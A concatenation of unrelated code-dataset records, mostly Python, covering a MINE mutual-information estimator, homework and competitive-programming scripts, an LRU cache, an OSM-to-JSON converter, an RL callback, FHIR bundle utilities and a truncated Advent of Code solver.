        self.mine_net.load_state_dict(torch.load(ch))  # restore the early-stopping checkpoint
    def update_mine_net(self, batch, mine_net_optim, ma_rate=0.01):
        """Run one optimizer step on a (joint, marginal) batch pair.

        Arguments:
            batch: tuple of (joint samples, marginal/reference samples),
                each of shape [batch_size x (len(cond)+1)]
            mine_net_optim: optimizer for ``self.mine_net``
            ma_rate: moving-average rate for the exp-term denominator

        Returns:
            (mi_lb, lossTrain): MI lower bound and the training loss tensor.
        """
        # batch is a tuple of (joint, marginal)
        joint , marginal = batch
        joint = torch.autograd.Variable(torch.FloatTensor(joint))
        marginal = torch.autograd.Variable(torch.FloatTensor(marginal))
        mi_lb , t, et = self.mutual_information(joint, marginal)
        self.ma_et = (1-ma_rate)*self.ma_et + ma_rate*torch.mean(et)
        # unbiasing use moving average
        loss = -(torch.mean(t) - (1/self.ma_et.mean()).detach()*torch.mean(et))
        # use biased estimator
        # loss = - mi_lb
        lossTrain = loss
        mine_net_optim.zero_grad()
        autograd.backward(loss)
        mine_net_optim.step()
        return mi_lb, lossTrain
    def mutual_information(self, joint, marginal):
        """Donsker-Varadhan lower bound: E_joint[T] - log E_marginal[exp T]."""
        t = self.mine_net(joint)
        et = torch.exp(self.mine_net(marginal))
        mi_lb = torch.mean(t) - torch.log(torch.mean(et))
        return mi_lb, t, et
    def forward_pass(self, X):
        """Evaluate the current MI lower bound on all rows of ``X`` (no optimizer step)."""
        joint = sample_batch(X, resp= self.resp, cond= self.cond, batch_size=X.shape[0], sample_mode='joint')
        marginal = sample_batch(X, resp= self.resp, cond= self.cond, batch_size=X.shape[0], sample_mode=self.sample_mode)
        joint = torch.autograd.Variable(torch.FloatTensor(joint))
        marginal = torch.autograd.Variable(torch.FloatTensor(marginal))
        mi_lb , t, et = self.mutual_information(joint, marginal)
        return mi_lb
    def predict(self, X):
        """Train on a 65/35 split of ``X`` and return the MI estimate.

        Arguments:
            X {[numpy array]} -- [N X (len(cond)+1)] data matrix
        Return:
            mutual information estimate (float); in 'unif' mode the
            bounding-box log-volume minus the estimate is returned instead.
        """
        self.X = X
        X_train, X_test = train_test_split(X, test_size=0.35, random_state=0)
        self.fit(X_train, X_test)
        mi_lb = self.forward_pass(X_test).item()
        if self.log:
            self.savefig(X, mi_lb)
        if self.sample_mode == 'unif':
            # Log-volume of the data's bounding box over the selected columns.
            if 0 == len(self.cond):
                X_max, X_min = X[:,self.resp].max(axis=0), X[:,self.resp].min(axis=0)
                cross = np.log(X_max-X_min)
            else:
                X_max, X_min = X.max(axis=0), X.min(axis=0)
                cross = sum(np.log(X_max-X_min))
            return cross - mi_lb
        return mi_lb
    def savefig(self, X, ml_lb_estimate):
        """Save a 4-panel diagnostic figure (data, training curve, T heatmap,
        estimate vs ground truth) to ``<prefix>/MINE``. Only supports a
        single conditioning variable."""
        if len(self.cond) > 1:
            raise ValueError("Only support 2-dim or 1-dim")
        fig, ax = plt.subplots(1,4, figsize=(90, 15))
        # plot the raw data (response vs conditioning column)
        ax[0].scatter(X[:,self.resp], X[:,self.cond], color='red', marker='o')
        # plot training curve
        ax[1] = plot_util.getTrainCurve(self.avg_train_mi_lb, self.avg_valid_mi_lb, ax[1])
        # Trained Function contour plot over the data's bounding box.
        Xmin = min(X[:,0])
        Xmax = max(X[:,0])
        Ymin = min(X[:,1])
        Ymax = max(X[:,1])
        x = np.linspace(Xmin, Xmax, 300)
        y = np.linspace(Ymin, Ymax, 300)
        xs, ys = np.meshgrid(x,y)
        z = self.mine_net(torch.FloatTensor(np.hstack((xs.flatten()[:,None],ys.flatten()[:,None])))).detach().numpy()
        z = z.reshape(xs.shape[1], ys.shape[0])
        ax[2], c = plot_util.getHeatMap(ax[2], xs, ys, z)
        fig.colorbar(c, ax=ax[2])
        ax[2].set_title('heatmap')
        # Plot result with ground truth
        ax[3].scatter(0, self.ground_truth, edgecolors='red', facecolors='none', label='Ground Truth')
        ax[3].scatter(0, ml_lb_estimate, edgecolors='green', facecolors='none', label=self.model_name)
        ax[3].set_xlabel(self.paramName)
        ax[3].set_ylabel(self.y_label)
        ax[3].legend()
        figName = os.path.join(self.prefix, "MINE")
        fig.savefig(figName, bbox_inches='tight')
        plt.close()
| handasontam/MMI | model/mine.py | mine.py | py | 12,635 | python | en | code | 1 | github-code | 90 |
22678561230 | #Daniel Torres
#PSID:1447167
#HW 2: part b
#part b
def main(date):
    """Convert a date like 'March 12, 2021' to its 'M/D/YYYY' form.

    Returns '' for any string that does not parse as a valid date
    (unknown month name, non-numeric day/year, missing comma, ...).
    """
    # Fixed: "November" was misspelled as "Novenber", so every valid
    # November date was silently rejected.
    month_of_number = {"January": 1, "February": 2, "March": 3, "April": 4,
                       "May": 5, "June": 6, "July": 7, "August": 8,
                       "September": 9, "October": 10, "November": 11,
                       "December": 12}
    try:
        year = date.split(",")[-1].strip()
        month = date.split(",")[0].split()[0]
        day = date.split(",")[0].split()[-1]
        month_number = month_of_number[month]
        int(year)  # validate the year is numeric
        int(day)   # validate the day is numeric
        return str(month_number) + "/" + day + "/" + year
    except Exception:
        # Any parse failure (bad month, non-numeric parts, empty input)
        # yields the empty-string sentinel, as before.
        return ""
# Convert every date in inputDates.txt (skipping the "-1" sentinel lines)
# and print the M/D/YYYY form produced by main().
with open("inputDates.txt") as f:
    for x in f.readlines():
        if x.strip() != "-1":
            print(main(x.strip()))
| datorre5/CIS2348-FALL2020 | HW2partB.py | HW2partB.py | py | 654 | python | en | code | 0 | github-code | 90 |
import sys
# Restored: the import line above was corrupted by metadata fused into the
# source dump. The rebinding below deliberately shadows the builtin with a
# faster buffered stdin reader (a common competitive-programming idiom).
input = sys.stdin.buffer.readline
def main():
    """Read N and integer arrays a, b from stdin; print "Yes"/"No".

    Counting argument visible in the code: `cb` accumulates decrements
    needed where a[i] > b[i]; `ca` accumulates paired increments available
    where a[i] <= b[i] (an odd gap also costs one extra `cb`). The answer
    is "Yes" iff ca >= cb.
    """
    N = int(input())  # NOTE(review): N is read but never used afterwards
    a = list(map(int,input().split()))
    b = list(map(int,input().split()))
    if sum(a) > sum(b):
        print("No")
    else:
        do = sum(b)-sum(a)  # NOTE(review): computed but never used
        ca,cb = 0,0
        for x,y in zip(a,b):
            if x > y:
                cb += x-y
            else:
                if (y-x)%2 == 0:
                    ca += (y-x)//2
                else:
                    ca += (y+1-x)//2
                    cb += 1
        if ca-cb >= 0:
            print("Yes")
        else:
            print("No")
if __name__ == "__main__":
    main()
| Aasthaengg/IBMdataset | Python_codes/p03438/s000749453.py | s000749453.py | py | 638 | python | en | code | 0 | github-code | 90 |
8402230971 | #!/usr/bin/env python3
""" LRUCache module
"""
from base_caching import BaseCaching
class LRUCache(BaseCaching):
    """ Inherits from BaseCaching and is a LRU cache.

    Recency is tracked in ``self.lru_order`` (oldest first); when the cache
    exceeds ``BaseCaching.MAX_ITEMS`` the least-recently-used key is evicted.
    """
    def __init__(self):
        """Initialize the cache store and the recency list."""
        super().__init__()
        self.lru_order = []
    def put(self, key, item):
        """ Add item to cache data, evicting the LRU entry if over capacity.

        Fixed: the previous ``if key and item`` silently dropped falsy but
        valid values such as 0, '' or False; only None must be rejected.
        """
        if key is not None and item is not None:
            if key in self.cache_data:
                self.lru_order.remove(key)
            self.lru_order.append(key)  # most recently used at the end
            self.cache_data[key] = item
            if len(self.cache_data) > BaseCaching.MAX_ITEMS:
                # Evict the least-recently-used key (front of the list).
                print("DISCARD: {}".format(self.lru_order[0]))
                self.cache_data.pop(self.lru_order[0])
                self.lru_order.pop(0)
    def get(self, key):
        """ Get item from cache data; refresh its recency on a hit. """
        if key is None or key not in self.cache_data:
            return None
        self.lru_order.remove(key)
        self.lru_order.append(key)
        return self.cache_data[key]
| Cyril-777/alx-backend | 0x01-caching/3-lru_cache.py | 3-lru_cache.py | py | 980 | python | en | code | 0 | github-code | 90 |
23271749193 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import xml.etree.cElementTree as ET
import pprint
import re
import codecs
import json
from audit_street import update_name
lower = re.compile(r'^([a-z]|_)*$')
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')

# OSM attributes that are grouped under the 'created' sub-document.
CREATED = ["version", "changeset", "timestamp", "user", "uid"]

# Street-type abbreviation fixes applied by audit_street.update_name.
mapping = {"St": "Street",
           "St.": "Street",
           "Rd": "Road",
           "Ave": "Avenue"
           }


def shape_element(element):
    """Shape one OSM XML element into a dict ready for MongoDB import.

    Only 'node' and 'way' elements are shaped; anything else returns None.
    Attribute values containing problem characters are skipped; attributes
    in CREATED go into a 'created' sub-document. 'addr:*' tags with a single
    colon go into an 'address' sub-document (street names cleaned via
    update_name); 'addr:*' tags with two or more colons are dropped.

    Fixed: 'pos' now stores [lat, lon] as floats (not strings) so MongoDB
    geospatial queries work on imported documents.
    """
    if element.tag != "node" and element.tag != "way":
        return None
    node = {}
    created = {}
    address = {}
    if element.tag == "way":
        node["node_refs"] = [nd.get('ref') for nd in element.iter("nd")]
    else:
        node['pos'] = [float(element.get('lat')), float(element.get('lon'))]
    for dkey, dval in element.items():
        if problemchars.search(dval):
            continue
        if dkey in CREATED:
            created[dkey] = dval
        else:
            node[dkey] = dval
    node["type"] = element.tag
    for tag in element.iter("tag"):
        k = tag.attrib["k"]
        v = tag.attrib["v"]
        if problemchars.search(k):
            continue
        if k.startswith("addr:"):
            if k.startswith("addr:street"):
                v = update_name(v, mapping)
            if k.count(":") == 1:
                address[k.replace("addr:", "")] = v
            # keys with a second colon (e.g. addr:street:name) are dropped
        else:
            node[k] = v
    if created:
        node["created"] = created
    if address:
        node["address"] = address
    return node
def process_map(file_in, pretty=False):
    """Parse an OSM XML file, shape each element, and dump a JSON array.

    Writes '<file_in>.json' and returns the list of shaped documents.

    Fixed: the previous version wrote a trailing comma before the closing
    ']' (the old comment even asked the user to delete it by hand), which
    produced invalid JSON; separators are now emitted between entries only.
    The ``pretty`` flag, previously ignored, now controls indentation.

    Args:
        file_in: Path to the OSM XML input file.
        pretty: If True, pretty-print each document with indentation.

    Returns:
        List of shaped element dicts (the same objects written to the file).
    """
    file_out = "{0}.json".format(file_in)
    data = []
    indent = 2 if pretty else None
    with codecs.open(file_out, "w") as fo:
        fo.write("[")
        first = True
        for _, element in ET.iterparse(file_in):
            el = shape_element(element)
            if el:
                data.append(el)
                if not first:
                    fo.write(",\n")
                fo.write(json.dumps(el, indent=indent))
                first = False
        fo.write("]")
    return data
def test():
    # Run the converter on the Southampton extract with pretty-printing on.
    data = process_map('southampton.osm', True)
if __name__ == "__main__":
    test()
| mouna199/project_udacity | create_json.py | create_json.py | py | 3,004 | python | en | code | 0 | github-code | 90 |
29134655454 | from msilib.schema import Error
from gym import Env
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common.buffers import ReplayBuffer
from scipy.fft import fft, fftfreq, fftn
from typing import Tuple
import matplotlib.pyplot as plt
import numpy as np
class FFTEvalCallback(BaseCallback):
    """Stable-Baselines3 callback that periodically FFT-analyses reward traces.

    Every ``EVAL_EVERY`` finished training episodes it runs ``EVAL_ROLLOUTS``
    evaluation episodes on ``eval_env``, computes the single-sided amplitude
    spectrum of the per-step rewards, and plots the mean +/- std spectrum of
    every evaluation round so far.
    """
    def __init__(self, eval_env: Env, verbose: int = 0, ):
        super().__init__(verbose)
        self.env = eval_env
        self.data = []           # list of (frequencies, mean spectrum, std spectrum)
        self.n_dones = -1        # episode counter; -1 so the first episode triggers an eval
        self.EVAL_EVERY = 10     # evaluate every N finished episodes
        self.EVAL_ROLLOUTS = 10  # rollouts averaged per evaluation
    def _on_step(self) -> None:
        # Any 'done' among the (possibly vectorized) sub-envs counts as one
        # finished training episode.
        if sum(self.locals["dones"]) > 0:
            self.n_dones = self.n_dones + 1
            if self.n_dones % self.EVAL_EVERY == 0:
                yf_list = []
                for _ in range(self.EVAL_ROLLOUTS):
                    actions, rewards = self._do_rollout()
                    data = np.squeeze(rewards)
                    N = len(data)
                    yf = fft(data)
                    # Single-sided amplitude spectrum.
                    yf = 2.0/N * np.abs(yf[0:N//2])
                    yf_list.append(yf)
                yf_m, yf_std = np.mean(yf_list, axis=0), np.std(yf_list, axis=0)
                T = self.env.dt  # NOTE(review): assumes eval_env exposes a step period `dt` -- confirm
                xf = fftfreq(N, T)[:N//2]
                self.data.append((xf, yf_m, yf_std))
                for i, (xf, yf_m, yf_std) in enumerate(self.data):
                    plt.plot(xf, yf_m, label='Episode ' + str(i*self.EVAL_EVERY))
                    plt.fill_between(xf, yf_m-yf_std, yf_m+yf_std, alpha=0.4)
                plt.grid()
                plt.legend()
                plt.xlabel("Frequency [Hz]")
                plt.ylabel("Rewards [-]")
                plt.show()
        return super()._on_step()
    def _do_rollout(self):
        """Run one full evaluation episode; return (actions, rewards) lists."""
        obs = self.env.reset()
        done, state = False, None
        actions = []
        rewards = []
        while not done:
            action, state = self.locals['self'].predict(obs, state=state, deterministic=False)
            actions.append(action)
            obs, reward, done, info = self.env.step(action)
            rewards.append(reward)
        # Restored: this return line was corrupted by metadata fused into the
        # source dump; it belongs after the loop so the whole episode is
        # collected before returning.
        return actions, rewards
35859386375 | """
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao.
"""
from campy.gui.events.timer import pause
from breakoutgraphics import BreakoutGraphics
FRAME_RATE = 2000 / 120  # pause per animation frame, in milliseconds
NUM_LIVES = 3            # Number of attempts
def main():
    """Run the Breakout game loop: move the ball, bounce it off walls,
    paddle and bricks, and stop when lives run out or all bricks are gone."""
    graphics = BreakoutGraphics()
    dx = graphics.get_dx()
    dy = graphics.get_dy()
    # Add animation loop here!
    num_lives = NUM_LIVES
    while True:
        # End conditions: out of lives, or the board has been cleared.
        if num_lives <= 0 or graphics.no_brick_left():
            break
        if graphics.ball_move:  # The ball will start to move after mouse clicked
            # update
            graphics.ball.move(dx, dy)
            # check collisions and bounce accordingly
            if graphics.hit_the_walls():
                dx = -dx
            if graphics.hit_the_ceiling():
                dy = -dy
            # dy > 0 guard avoids the ball bouncing repeatedly on the paddle.
            # NOTE(review): `touch_paddle` is used without parentheses while the
            # other checks are calls -- confirm it is a property, not a method.
            if graphics.touch_paddle and dy > 0:
                dx = graphics.get_dx()  # re-randomize dx on every paddle hit
                dy = -dy
            if graphics.brick_collision_happened():
                dx = graphics.get_dx()  # re-randomize dx on every brick hit
                dy = -dy
            if graphics.lose_a_life():
                num_lives -= 1
        # pause
        pause(FRAME_RATE)
if __name__ == '__main__':
main()
| tungtunghung/mystanCodeproject | mystanCodeprojects/break_out_game/breakout.py | breakout.py | py | 1,380 | python | en | code | 0 | github-code | 90 |
import bisect
# Restored: the import line above was corrupted by metadata fused into the
# source dump.

# Reads N, K and sorted positions X, then computes the minimum walking
# distance from the origin needed to reach K of the positions (walk the
# cheaper side first, doubling it, then the other side once).
N, K = map(int,input().split())
X = list(map(int,input().split()))
s = bisect.bisect_left(X,0)  # index where the origin sits in X
if 0 in X:
    # The origin is already a position: reaching it is free.
    K -= 1
else:
    # Insert a sentinel origin so every window of K+1 points straddles it.
    bisect.insort_left(X,0)
    N += 1
MIN = 2 * 10**9  # larger than any feasible distance
for i in range(K+1):
    # Window containing the origin: leftmost X[s-K+i], rightmost X[s+i].
    if s - K + i >= 0 and s + i <N:
        f = X[s -K+i]
        l = X[s+i]
        # Traverse the nearer extreme twice and the farther one once.
        if abs(f) < abs(l):
            ans = abs(f) * 2 + abs(l)
        else:
            ans = abs(l) * 2 + abs(f)
        MIN =min(MIN,ans)
# Restored: this print was corrupted by metadata fused into the source dump.
print(MIN)
def chess(h, w):
    """Return the checkerboard character for cell (h, w).

    Cells whose coordinate sum is even get '#', the rest get '.'.
    (The `def` line was restored after being corrupted by fused metadata.)
    """
    return '#' if (h + w) % 2 == 0 else '.'
# Print an H x W checkerboard for each input pair; "0 0" terminates.
while True:
    H, W = map(int, input().split())
    if H == 0 and W == 0:
        break
    for i in range(H):
        for j in range(W):
            print(chess(i,j), end='')
        print()
    print()
| Aasthaengg/IBMdataset | Python_codes/p02405/s821293644.py | s821293644.py | py | 246 | python | en | code | 0 | github-code | 90 |
26256702311 | from typing import Any
# Read 20 integers from stdin, then report their mean, maximum and minimum.
lista = []
maior = 0
menor = 0
soma = 0
print("Tigite 20 números: ")  # NOTE(review): prompt typo -- likely meant "Digite"
while len(lista) < 20:
    item = int(input())
    lista.append(item)
for i in lista:
    soma += i
print("A média dos números digitados é: ", soma / 20)
# Single pass for max/min, seeding both with the first element so negative
# inputs are handled correctly.
for i in range(len(lista)):
    if i == 0:
        maior = menor = lista[i]
    else:
        if lista[i] > maior:
            maior = lista[i]
        if lista[i] < menor:
            menor = lista[i]
print("O maior valor é:", maior)
# Restored: this line was corrupted by metadata fused into the source dump.
print("O menor valor é:", menor)
17967914009 | import sys
from collections import defaultdict
from heapq import heappush, heappop
def input():
    # Shadow the builtin with a stripped readline for faster stdin parsing.
    return sys.stdin.readline().strip()
def dijkstra(adj_list, start):
    """Single-source shortest paths (Dijkstra) over a 0-indexed adjacency list.

    ``adj_list[v]`` yields (neighbor, weight) pairs; ``len(adj_list)`` is the
    vertex count. Returns the list of distances from ``start`` (``inf`` for
    unreachable vertices).
    """
    dist = [float("inf")] * len(adj_list)
    dist[start] = 0
    settled = set()
    heap = [(0, start)]
    while heap:
        d, u = heappop(heap)
        if d > dist[u]:
            continue  # stale heap entry; a shorter path was already found
        settled.add(u)
        for nxt, weight in adj_list[u]:
            if nxt in settled:
                continue
            candidate = d + weight
            if candidate < dist[nxt]:
                dist[nxt] = candidate
                heappush(heap, (candidate, nxt))
    return dist
# Build the weighted tree: N-1 edges, 1-indexed input converted to 0-indexed.
N = int(input())
g = defaultdict(list)
for _ in range(N - 1):
    a, b, c = map(int, input().split())
    a -= 1
    b -= 1
    g[a].append((b, c))
    g[b].append((a, c))
# All Q queries route through vertex K, so one Dijkstra from K suffices:
# answer for (x, y) is dist(x, K) + dist(K, y).
Q, K = map(int, input().split())
K -= 1
d = dijkstra(g, K)
ans = []  # NOTE(review): accumulator is never used; answers print directly
for _ in range(Q):
    x, y = map(int, input().split())
    x -= 1
    y -= 1
    print(d[x] + d[y])
| Aasthaengg/IBMdataset | Python_codes/p03634/s800994110.py | s800994110.py | py | 988 | python | en | code | 0 | github-code | 90 |
71344776618 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import seaborn as sns
from sklearn import linear_model
# In[2]:
def read_data(file):
    """Load the CSV at ``file`` into a pandas DataFrame."""
    frame = pd.read_csv(file)
    return frame
# In[5]:
# Load the combined Miami climate / tangerine-production data set.
miami = read_data('miami_full.csv')
# In[7]:
# setup linear regression for tangerine production (two climate predictors)
tang_reg = linear_model.LinearRegression()
tang_reg.fit(miami[['Average Temperature', 'Average Rainfall']], miami['Tangerines'])
# coefficients (bare expressions below only display output inside Jupyter)
tang_reg.coef_
# In[8]:
# intercept
tang_reg.intercept_
# In[9]:
# get correlation between temperature and tangerines produced
miami['Average Temperature'].corr(miami['Tangerines'])
# In[10]:
# get correlation between rainfall and tangerines produced
miami['Average Rainfall'].corr(miami['Tangerines'])
# In[11]:
# plot graph of tangerine production vs average temperature
sns.set_theme()
tang_temp_graph = sns.lmplot(
    data=miami,
    x="Average Temperature", y="Tangerines",
    height=5
)
tang_temp_graph.set_axis_labels("Average Temperature (Fahrenheit)", "Tangerines Produced (1000 MT)")
# In[ ]:
# In[12]:
# plot graph of tangerine production vs average rainfall
tang_rain_graph = sns.lmplot(
    data=miami,
    x="Average Rainfall", y="Tangerines",
    height=5
)
tang_rain_graph.set_axis_labels("Average Rainfall (inches)", "Tangerines Produced (1000 MT)")
| brandonzPB/economics_data_analysis | 187/ANALYSIS_miami_tangerines.py | ANALYSIS_miami_tangerines.py | py | 1,344 | python | en | code | 0 | github-code | 90 |
16795996520 | import logging
from fhir.resources.bundle import Bundle
from fhir.resources.reference import Reference
from fhir.resources.patient import Patient
from fhir.resources.practitionerrole import PractitionerRole
from fhir.resources.servicerequest import ServiceRequest
from collections import OrderedDict
logger = logging.getLogger('bserfeedbackapi.util.bundleparser')
def find_subject(bundle: Bundle, service_request: ServiceRequest):
    """Return the resource referenced by ``service_request.subject``.

    Args:
        bundle: Bundle searched for the referenced resource.
        service_request: ServiceRequest whose ``subject`` points at the patient.

    Raises:
        LookupError: if the subject reference cannot be read, or if the
            referenced resource is not present in the bundle (propagated
            unchanged from ``find_resource_by_reference``).
    """
    try:
        patient_reference = service_request.subject.reference
    except AttributeError:
        # subject (or service_request itself) is missing; previously this
        # caught `Exception`, which could also hide unrelated bugs.  The
        # message is kept verbatim (it was an f-string with no placeholders).
        raise LookupError("Failed finding ServiceRequest.subject reference. This is likely due to a missing ServiceRequest, and may not indicate an issue with the Patient directly.")
    # The old `except LookupError as e: raise e` added nothing -- just let
    # find_resource_by_reference's LookupError propagate.
    return find_resource_by_reference(bundle, patient_reference)
def find_resource_by_profile(bundle: Bundle, profile: str):
    """Return the first bundle resource whose ``meta.profile`` contains *profile*.

    Args:
        bundle: Bundle whose entries are scanned in order.
        profile: Canonical profile URL to look for.

    Raises:
        LookupError: if no entry declares the requested profile.
    """
    for entry in bundle.entry:
        try:
            if profile in entry.resource.meta.profile:
                return entry.resource
        except (AttributeError, TypeError):
            # meta or meta.profile is absent/None on this entry -- expected
            # for resources without profile claims, so just log and move on.
            # (Previously `except Exception`, which would also mask real bugs.)
            logger.debug(f"Bundle entry {entry.fullUrl} does not have profile.")
    raise LookupError(f"Resource with profile {profile} not found.")
def find_resource_by_id(bundle: Bundle, id: str):
    """Return the resource in *bundle* whose logical id equals *id*.

    Raises:
        LookupError: when no entry carries the requested id.
    """
    for item in bundle.entry:
        candidate = item.resource
        if candidate.id == id:
            return candidate
    raise LookupError(f"Resource with id {id} not found.")
def find_resource_by_reference(bundle: Bundle, reference: str):
    """Resolve a reference string against the entries of *bundle*.

    An entry matches when its ``fullUrl`` equals the reference (or is a
    suffix of it, handling absolute URLs), or when its relative
    ``"ResourceType/id"`` form equals the reference.

    Note: the parameter was previously annotated ``Reference``, but the
    implementation (``endswith`` / string comparison) and the callers all
    pass a plain string, so the annotation is corrected to ``str``.

    Raises:
        LookupError: if nothing in the bundle matches.
    """
    for entry in bundle.entry:
        if entry.fullUrl == reference or reference.endswith(entry.fullUrl):
            return entry.resource
        elif f"{entry.resource.resource_type}/{entry.resource.id}" == reference:
            return entry.resource
    raise LookupError(f"Resource with reference {reference} not found.")
def get_references(resource, reference_list: list):
    """Recursively collect every "reference" value found in *resource*.

    Mutates and returns *reference_list*; values are appended in
    traversal order.
    """
    # fhir.resources models expose .dict(); nested values coming from a
    # previous .dict() call are traversed as OrderedDicts directly.
    if type(resource) is not OrderedDict:
        resource = resource.dict(exclude_none=True)
    for k, v in resource.items():
        if k == "reference":
            reference_list.append(resource[k])
        elif type(v) is list:
            for item in v:
                # NOTE(review): only OrderedDict items are recursed into; a
                # plain dict would be silently skipped -- confirm .dict()
                # always yields OrderedDict on the pydantic version in use.
                if type(item) is OrderedDict:
                    get_references(item, reference_list)
        elif type(v) is OrderedDict:
            get_references(v, reference_list)
    return reference_list
def simplify_references(resource):
    """Recursively rewrite every "reference" value in *resource* to its
    relative "ResourceType/id" form.

    Returns the dict representation; when a model (not an OrderedDict) is
    passed in, the conversion produces a NEW dict, so the caller must use
    the return value rather than rely on in-place mutation.
    """
    if type(resource) is not OrderedDict:
        resource = resource.dict(exclude_none=True)
    for k, v in resource.items():
        if k == "reference":
            resource[k] = clean_reference_url(v)
        elif type(v) is list:
            for item in v:
                # NOTE(review): like get_references, only OrderedDict items
                # are recursed into -- verify against the pydantic version.
                if type(item) is OrderedDict:
                    simplify_references(item)
        elif type(v) is OrderedDict:
            simplify_references(v)
    return resource
def clean_reference_url(reference: str):
    """Reduce a reference URL to its relative "ResourceType/id" form.

    e.g. "http://host/fhir/Patient/123" -> "Patient/123".  A reference
    containing no "/" (already a bare token) is returned unchanged; the
    previous version raised IndexError in that case.
    """
    parts = reference.split("/")[-2:]
    if len(parts) < 2:
        return reference
    return f"{parts[-2]}/{parts[-1]}"
# | BSeR-PoC/BSeR-Recipient-API | util/bundleparser.py | bundleparser.py | py | 3,039 | python | en | code | 0 | github-code | 90
18540792549 | from collections import Counter
# Count subarrays of `a` summing to zero: two equal prefix sums
# s[l] == s[r] mean the elements strictly between them sum to 0.
n=int(input())
a=list(map(int,input().split()))
# s[i] = sum of the first i elements (prefix sums, s[0] = 0).
s=[0]*(n+1)
for i in range(n):
    s[i+1] = s[i] + a[i]
c = Counter(s)
# `n` is rebound here to the set of distinct prefix-sum values.
n = set(s)
ans = 0
for i in n:
    # choose any 2 of the c[i] equal prefix sums: c[i]*(c[i]-1)//2 pairs
    ans += ((c[i]*(c[i]-1))//2)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03363/s496899257.py | s496899257.py | py | 224 | python | en | code | 0 | github-code | 90
18050010119 | N=int(input())
# T[i] = running prefix maximum after position i, A[i] = running suffix
# maximum from position i.  Count hidden sequences consistent with both,
# modulo 10**9 + 7.
T=list(map(int,input().split()))
A=list(map(int,input().split()))
# cand[i]  != -1 where the prefix maxima FORCE the value at i (T rises there);
# cand2[i] != -1 where the suffix maxima force it (A falls going right).
cand=[-1]*N
cand2=[-1]*N
flag=1
ans=1
p=10**9+7
for i in range(N):
    if i==0:
        cand[i]=T[i]
    else:
        if T[i]!=T[i-1]:
            cand[i]=T[i]
for i in range(N-1,-1,-1):
    if i==N-1:
        cand2[i]=A[i]
    else:
        if A[i]!=A[i+1]:
            cand2[i]=A[i]
#print(cand)
#print(cand2)
# Multiply the free choices per position; any contradiction zeroes the answer.
ans=1
for i in range(N):
    if (cand[i]==-1)and(cand2[i]==-1):
        # unconstrained position: any value up to min of both running maxima
        ans=(ans*min(T[i],A[i]))%p
    elif (cand[i]==-1):
        # forced by suffix only: must not exceed the prefix maximum
        if T[i]<cand2[i]:
            ans=0
    elif (cand2[i]==-1):
        if A[i]<cand[i]:
            ans=0
    else:
        # forced by both sides: the two forced values must agree
        if cand[i]!=cand2[i]:
            ans=0
print(ans)
#print(flag,cand)
# NOTE: `flag` is never updated; the dead draft below is kept inside a
# string literal (it is evaluated and discarded at runtime).
"""
lmax=[0]*N
rmax=[0]*N
for i in range(N):
    if i==0:
        lmax[i]=cand[i]
        rmax[N-1-i]=cand[N-1-i]
    else:
        if cand[i]==-1:
            lmax[i]=lmax[i-1]
        else:
            lmax[i]=cand[i]
        if cand[N-i-1]==-1:
            rmax[N-i-1]=rmax[N-i]
        else:
            rmax[N-i-1]=cand[N-i-1]
#print(lmax,rmax)
for i in range(N):
    if cand[i]==-1:
        ans=(ans*min(A[i],T[i]))%p
if flag==0:
    print("0")
else:
    print(ans%p)
""" | Aasthaengg/IBMdataset | Python_codes/p03959/s567131683.py | s567131683.py | py | 1,197 | python | en | code | 0 | github-code | 90
74775105895 | #!/usr/bin/env python3
from collections import deque
from copy import deepcopy
from utils import read_input
TEST_INPUT = [
"Player 1:",
"9",
"2",
"6",
"3",
"1",
"",
"Player 2:",
"5",
"8",
"4",
"7",
"10",
]
TEST_INPUT_2 = [
"Player 1:",
"43",
"19",
"",
"Player 2:",
"2",
"29",
"14",
]
def create_decks(file_input: list) -> dict:
    """
    Parse the puzzle input into one deque of cards per player.

    Args:
        file_input: A list of lines from the input file; "Player N:" lines
            start a new deck, numeric lines are cards, blank lines separate.

    Returns:
        A dict mapping player name ("Player N") to a deque of ints,
        top card first.
    """
    decks = {}
    for row in file_input:
        if not row:
            continue
        if row.startswith("Player"):
            header = row.strip(":")
            decks[header] = deque()
        else:
            decks[header].append(int(row))
    return decks
def simulate_round(decks: dict) -> dict:
    """
    Play one round of 'Combat': each player reveals the top card; the
    higher card's owner places their own card, then the opponent's card,
    at the bottom of their deck.

    Args:
        decks: A dict containing the deck of each player (mutated in place).

    Returns:
        The same dict, after the round.
    """
    top_one = decks["Player 1"].popleft()
    top_two = decks["Player 2"].popleft()
    if top_one > top_two:
        decks["Player 1"].extend((top_one, top_two))
    elif top_two > top_one:
        decks["Player 2"].extend((top_two, top_one))
    return decks
def simulate_recursive_round(decks: dict, history: list) -> tuple:
    """Play one round of 'Recursive Combat'.

    If this exact deck configuration was already seen in this game,
    Player 1 wins immediately (signalled by emptying Player 2's deck).
    When both players hold at least as many cards as the value they drew,
    the round is decided by a recursive sub-game on copies of the decks;
    otherwise the higher card wins as in normal Combat.

    Returns:
        (decks, history) after the round; both are mutated in place.
    """
    if decks in history:
        decks["Player 2"] = deque()
        return decks, history
    history.append(deepcopy(decks))
    p1_card = decks["Player 1"].popleft()
    p2_card = decks["Player 2"].popleft()
    if p1_card <= len(decks["Player 1"]) and p2_card <= len(decks["Player 2"]):
        p1_subdeck = list(decks["Player 1"])[0:p1_card]
        p2_subdeck = list(decks["Player 2"])[0:p2_card]
        # Shortcut: if Player 1 holds the highest card of the sub-game they
        # win without recursing.  NOTE(review): this is the well-known AoC
        # optimization, valid for Player 1 only (the repetition rule can
        # hand them the game, never Player 2) -- confirm before reusing.
        if max(p1_subdeck) > max(p2_subdeck):
            decks["Player 1"].append(p1_card)
            decks["Player 1"].append(p2_card)
        else:
            subdecks = {"Player 1": deque(p1_subdeck), "Player 2": deque(p2_subdeck)}
            subgame_winner = simulate_recursive_game(subdecks)["player"]
            if subgame_winner == "Player 1":
                decks["Player 1"].append(p1_card)
                decks["Player 1"].append(p2_card)
            elif subgame_winner == "Player 2":
                decks["Player 2"].append(p2_card)
                decks["Player 2"].append(p1_card)
        return decks, history
    elif p1_card > p2_card:
        decks["Player 1"].append(p1_card)
